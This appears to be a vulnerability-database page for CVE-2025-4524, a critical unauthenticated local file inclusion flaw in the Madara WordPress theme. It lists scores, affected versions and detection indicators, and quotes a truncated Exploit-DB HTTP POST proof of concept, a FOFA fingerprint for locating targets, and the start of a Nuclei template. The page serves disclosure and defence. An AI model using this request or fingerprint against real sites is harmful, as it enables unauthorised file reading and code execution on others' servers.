CVE-2025-4524
published 2025-05-21CVE-2025-4524: The Madara – Responsive and modern WordPress theme for manga sites theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and…
PriorityP277critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
9.09%
94.7th percentile
The Madara – Responsive and modern WordPress theme for manga sites theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.2.2 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpstylish | madara_responsive_and_modern_wordpress_theme_for_manga_sites | <= 2.2.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated POST requests to /wp-admin/admin-ajax.php with action=madara_load_more and a 'template' parameter containing path traversal sequences (e.g., '../' or 'plugins/../'). ↗
- →Flag requests containing the X-Requested-With: XMLHttpRequest header combined with the madara_load_more action and traversal strings in the template parameter. ↗
- →Use FOFA/Shodan fingerprint body='/wp-content/themes/madara/' to identify potentially vulnerable WordPress instances for proactive scanning. ↗
- →Inspect HTTP response bodies for 'root:.*:0:0:' pattern, indicating successful /etc/passwd inclusion via the LFI vulnerability. ↗
- →The vulnerability is exploitable by unauthenticated attackers; no session cookie or authentication token is required in the POST request. ↗
- ·All versions up to and including 2.2.2 of the Madara theme are vulnerable; the fix is present in version 2.2.2.1 and later. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Madara - Local File Inclusion
exploitdb·2026-04-06·CVSS 9.8
CVE-2025-4524 [CRITICAL] WordPress Madara - Local File Inclusion
WordPress Madara - Local File Inclusion
---
# Exploit Title: WordPress Madara Local File Inclusion
# Date: November 1, 2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: WordPress Theme Madara
# Software Link: WordPress Theme Madara
# Tested on: [OS / PHP / WordPress versions used in testing — e.g., Ubuntu 22.04, PHP 8.1, WP 6.4]
# CVE: CVE-2025-4524
#Attack Vector
body="/wp-content/plugins/madara/"
#POC
POST /wp-admin/admin-ajax.php HTTP/2
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 490
action=madara_load_more&page=1&template=p
Nuclei
WordPress Madara Theme < 2.2.2.1 - Local File Inclusion
nuclei·CVSS 9.8
CVE-2025-4524 [CRITICAL] WordPress Madara Theme < 2.2.2.1 - Local File Inclusion
WordPress Madara Theme < 2.2.2.1 - Local File Inclusion
Madara WordPress theme <= 2.2.2 contains a local file inclusion vulnerability caused by improper sanitization of the 'template' parameter, letting unauthenticated attackers execute arbitrary files on the server, exploit requires crafted request.
Template:
id: CVE-2025-4524
info:
name: WordPress Madara Theme < 2.2.2.1 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
Madara WordPress theme <= 2.2.2 contains a local file inclusion vulnerability caused by improper sanitization of the 'template' parameter, letting unauthenticated attackers execute arbitrary files on the server, exploit requires crafted request.
impact: |
Unauthenticated attackers can execute arbitrary PHP code, bypass access controls, and access se
No writeups or analysis indexed.
2025-05-21
Published